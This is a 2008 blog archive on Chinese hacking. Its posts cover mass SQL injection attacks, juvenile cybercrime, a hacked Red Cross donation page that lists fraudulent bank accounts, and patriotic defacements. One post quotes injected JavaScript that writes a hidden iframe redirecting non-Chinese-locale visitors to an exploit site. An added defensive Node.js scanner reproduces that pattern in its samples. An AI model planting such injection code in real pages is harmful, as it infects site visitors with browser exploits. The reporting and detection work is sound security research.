Archive for May, 2008

May 20 2008

Web sites across China and Taiwan are being hit by a mass SQL injection attack

Published by under Uncategorized

From Computer World:

Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan.

First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP addresses, said Wayne Huang, CEO of Armorize Technologies Inc. in Taipei.

“The attack is ongoing,” Huang said. “Even if they can’t successfully insert malware, they’re killing lots of Web sites right now, because they’re just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim Web sites.”

Read more…here


May 19 2008

“Electronic Heroin” an analysis of Chinese juvenile cybercrime (Part II)

Published by under Uncategorized

“Electronic Heroin” an analysis of Chinese juvenile cybercrime (Part I)

Second, analysis on the causes of juvenile cybercrime

What are the reasons for juvenile cybercrime? Adolescents are in puberty, when large changes take place in both physiology and psychology. Individual youth are led down the wrong road and step onto the path of criminality due to individual physiology, psychology and different types of conflicts and contradictions. Additionally, in real life there are unhealthy influences, and during the socialization process deviations and distortions easily occur in individual youth.

  1. As young people mature, there is a conflict between a sense of isolation and an intense feeling of needing to belong. On the internet, they find this compensation in the openness, equality and freedom that make a perfect match for their needs. This makes juveniles the main crowd on the internet. The virtual nature, openness and freedom of the internet permits unrestricted conversations that cause youth to disseminate obscene materials; their morals and sense of responsibility decay; and their awareness of legality is diluted to the point they don’t feel it is a crime. It becomes so serious that they will even break the law.
  2. The current internet legal system is not robust, allowing cybercriminals to act without legal restrictions. Although the country has laid out a series of laws and regulations regarding internet security and punishments for computer crimes, such as the “People’s Republic of China Computer Information Systems Security and Safeguards Regulation,” the current laws are unable to adapt to the current situation of computer development. This is especially true for new internet problems that arise that the law is unable to restrict. This brings about a legal gap.
  3. The unhealthy content on the internet has caused juvenile criminals to bury (hide) hidden dangers. The internet is full of pornography, reactionary (material) and violent information, as well as traps. Understaffed chatroom supervision allows juvenile cybercriminals to bury (hide) inducements. Some managers of underground internet cafes are the ringleaders who entice youth into criminal activity. Some internet cafe managers are only concerned with profit, regardless of the harm the unhealthy information does to the youth, or the youth browsing all manner of pornography, reactionary (material), or violent websites. Some go so far as to supply them with these materials. At the same time, bloody and violent internet games are the hotbed for juvenile cybercrime. Research indicated that long-term playing of bloody and violent online games can cause the user to develop an aggressive personality that leads to criminal activity.
  4. Factors in society, school and the family are also causes of juvenile cybercrime. Some morally corrupt individuals online recklessly spread pornographic and violent images, as well as popular online games that cause segments of the youth to become infatuated with them. They are unable to pay the online game fees so they take risks. The school’s education on ethics and online morality is insufficient. The negative evaluation of weak students, the dislike and discrimination against students with bad behavior causes some students to give up on themselves. They become infatuated with the internet and look there to find self confidence and happiness. Furthermore, the education at home is inappropriate, with parents not strictly supervising their children online. Some parents’ unhealthy personal habits also influence their children.


May 17 2008

Chinese Red Cross Website Hacked to Steal Earthquake Relief Donations

Published by under Hacking for money

Hacker illegally invades section of the official Red Cross website and tampers with solicited donation accounts

Verified by the Ministry of Public Security, a section of the official Red Cross website has been illegally hacked. According to the report, criminal elements gained access to the section of the website that held the special accounts for earthquake disaster relief donations.

An individual named Li Bujiu had opened four fraudulent bank accounts to steal the funding.

The Ningbo Bank released a statement warning all citizens to verify account numbers when making donations. The bank suggested using CCTV, TV, and newspapers as references to verify the accounts.

The falsified accounts were listed as follows:

Opened by Li Yaqiong at the Henan, bank: Agriculture Bank of China, ACCT #: 6228482080560018616;

Opened by Li Bujiu at the Commerce bank, ACCT #: 6222002201101753792;

Opened by Li Bujiu at the Agricultural bank, ACCT #: 6228480150082864813;

Opened by Li Bujiu at the Construction bank, ACCT #: 6227003526450024660;

Opened by Li Bujiu at the Postal Savings Bank, ACCT #: 6221886400011381263;

Opened by Lin Yumin at the Agricultural bank, ACCT#: 9559980150169780312

I think it was Eddie Murphy who once said, “The only reason you would want to do something like this is if you wanted to go straight to hell and not wait in line!”

5 responses so far

May 16 2008

“Electronic Heroin” an analysis of Chinese juvenile cybercrime

This is a long article and will need to be done in at least two parts (three?), along with a lot of gisting. It came out yesterday on Chinacourt.org and provides an in-depth look at the drivers pushing juvenile cybercrime in China:

Analysis: Juvenile Cybercrime Causes and Prevention

In the past few years, following the rapid expansion of the internet in our country (China), the internet has become a daily part of many people’s lives and an integral component. According to statistics, in 2007, the number of online users in our country (China) reached 162 million people with juvenile users accounting for 85.8% of that figure. Furthermore, among the country’s juvenile users, 13.2% have become addicts and another 13% manifest internet addiction tendencies. The highest proportion of internet addiction occurs in 17.1% of juvenile users from the ages of 13 to 17. While the internet has the prospect of bringing happiness and creating large amounts of wealth, it also introduces enticements and sin. According to statistical data, 90% of juveniles go online to play games, while the rest use it to chat or browse unhealthy websites. Browsing unhealthy websites and playing online games is either the direct or indirect cause of juvenile crime. This article will analyze the manifestation of juvenile cybercrime, exploring all of the causes that entice it, in order to have a beneficial discussion on countermeasures to prevent juvenile cybercrime.

First, the manifestation and characteristics of juvenile cybercrime:

Following the application and development of computer network technology, the youth have clearly become the majority of internet users and cybercrime has become a new phenomenon of juvenile criminals. Due to the psychological immaturity of youth, they unhesitatingly throw themselves into the internet, becoming excessively dependent and turn into “electronic heroin junkies.” Not only has the internet taken away their thirst for knowledge and kindheartedness, it has also robbed them of their precious youth. From investigations into cybercrime cases over the last couple of years, Chinese juvenile cybercrime manifests itself in these forms:

  1. The internet is used to carry out traditional types of crime such as theft, ransom, injury, fraud, robbery…etc. The virtual nature of the internet provides an artificial space and convenient channel for juveniles to carry out crimes. They can very easily hide their true identity, address…etc, to carry out criminal activity.

2 responses so far

May 15 2008

More Patriotic Hacking

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated JavaScript with a function that checks whether the web browser is configured for PRC/Mainland Chinese – zh-cn. Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits. Cool. Here is the code snippet from the ISC:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!
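
An added example, not from the original post or the ISC write-up: a small Node.js triage scanner for the two injection patterns described above (text appended to the end of a page, and a locale-gated script that writes a zero-height iframe). The sample pages, the finding names and the example.invalid host are constructed for illustration, and reading "appended to the bottom" as content after the closing </html> tag is an assumption.

```javascript
// Added example: triage checks for injected content in a static HTML page.
// Sample pages are constructed; example.invalid is a placeholder host.

// <iframe ...> opening tags, including ones inside document.write strings.
const IFRAME_RE = /<iframe\b[^>]*>/gi;
// Browser-locale properties an injected script can branch on.
const LOCALE_RE = /navigator\.(systemLanguage|userLanguage|browserLanguage|language)\b/i;
const WRITE_RE = /document\.write(ln)?\s*\(/i;

// True when the tag declares a zero width or height (an invisible frame).
function isHiddenIframe(tag) {
  return /\b(width|height)\s*=\s*\\?["']?0(?![\d.%])/i.test(tag);
}

// Return the list of finding names for one page's source text.
function scanPage(html) {
  const findings = [];
  // 1. Anything after the last closing </html> tag (assumed shape of text
  //    "appended to the bottom" of index.htm).
  const close = [...html.matchAll(/<\/html\s*>/gi)].pop();
  if (close && html.slice(close.index + close[0].length).trim() !== '') {
    findings.push('content-after-html-close');
  }
  // 2. Invisible iframes, in markup or written by script.
  if ((html.match(IFRAME_RE) || []).some(isHiddenIframe)) {
    findings.push('hidden-iframe');
  }
  // 3. Script that reads the visitor's locale and also writes markup.
  if (LOCALE_RE.test(html) && WRITE_RE.test(html)) {
    findings.push('locale-gated-write');
  }
  return findings;
}

// Constructed samples: a benign page, a defaced page, and a page carrying a
// locale-gated iframe writer of the shape quoted above.
const CLEAN = '<html><body><iframe src="/map" width="400" height="300"></iframe></body></html>\n';
const DEFACED = '<html><body>Home</body></html>\nThis is a mass invasion.';
const INJECTED = '<html><body>Home</body></html>\n<script>' +
  'if (navigator.systemLanguage=="zh-cn"){}else{document.writeln(' +
  '"<iframe src=http://example.invalid/index.htm width=100 height=0></iframe>");}' +
  '</script>';

for (const [name, page] of [['clean', CLEAN], ['defaced', DEFACED], ['injected', INJECTED]]) {
  console.log(name, scanPage(page));
}
```

Frames hidden through CSS rather than width/height attributes are outside what this check covers, so a clean result is a triage signal only.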

3 responses so far

May 14 2008

Chinese hacker organization Hackbase donates to the relief effort in Sichuan

Published by under Uncategorized

This gives me an opportunity to point out that this is not, and never will be, an anti-China blog. Our hearts and prayers go out to the country and families of all those affected by the recent earthquake that occurred in Sichuan.

Also in the interest of fairness, since I am quick to point out every nefarious act they commit, Chinese hackers do love their country and care about their fellow citizens. At times, we must remember that a majority of the members in these organizations are young men and women in their early 20s who lead with their hearts. In that spirit, members of Hackbase.com have raised 5,000 YUAN and are donating it to the victims of the earthquake. Good for them.

2 responses so far

May 13 2008

Chinese hacker…repeat offender!

Published by under Hacker Hunting

For some this may be a familiar face, for the rest, let me introduce Sunwear. We met Mr. Sunwear back in November, when he was doing bad things to Japanese websites and leaving some rather crude defacements. Sunwear and a friend of his named Kitty became so upset at the attention he was receiving on the blog that they left comments imploring us to remove the article. No such luck for him.

So, did Sunwear swear off his life of crime, turn over a new leaf and devote his life to charity? No such luck for me:

Just for fun

Just for fun? Words alone cannot express how disappointed I am…


May 13 2008

Chinese hacker culture spreading…be very afraid!

Published by under Uncategorized

Sign above the internet cafe reads “Hacker Tribe.”

No, this is not my new shtick. You will not be burdened with a building a day that has the Chinese characters for  hacker attached to it…unless, it becomes a really popular feature on the blog. OK, so it won’t.

Two things to point out here, one the ad for the internet cafe and the other a comment on the place:

  1. The internet cafe does not have a website…repeat, the INTERNET cafe does not have a website
  2. Commenter: Who knows Hacker Tribe’s IP address?  Who chose this name? Aren’t they worried about getting attacked?


May 13 2008

Dancho Danchev FirePack Exploitation Kit Localized to Chinese

Published by under Chinese Malware

Dancho Danchev has a really good analysis of the FirePack Exploitation kit localized to Chinese. Furthermore, he has some excellent thoughts on why they have chosen to localize these kits into their native language.

What is prompting Chinese users to translate these kits to their native language anyway? Is it the kit’s popularity, success rates, lack of alternatives…

Continue reading the whole article…here.


May 12 2008

Top Chinese Veteran Hackers

Published by under Uncategorized

This board post from cnhacker.com popped up in my Google Alerts the other day and I thought it was worth sharing. It is a list that the poster believes covers the top Chinese veteran hackers. Follow the link to the full article.


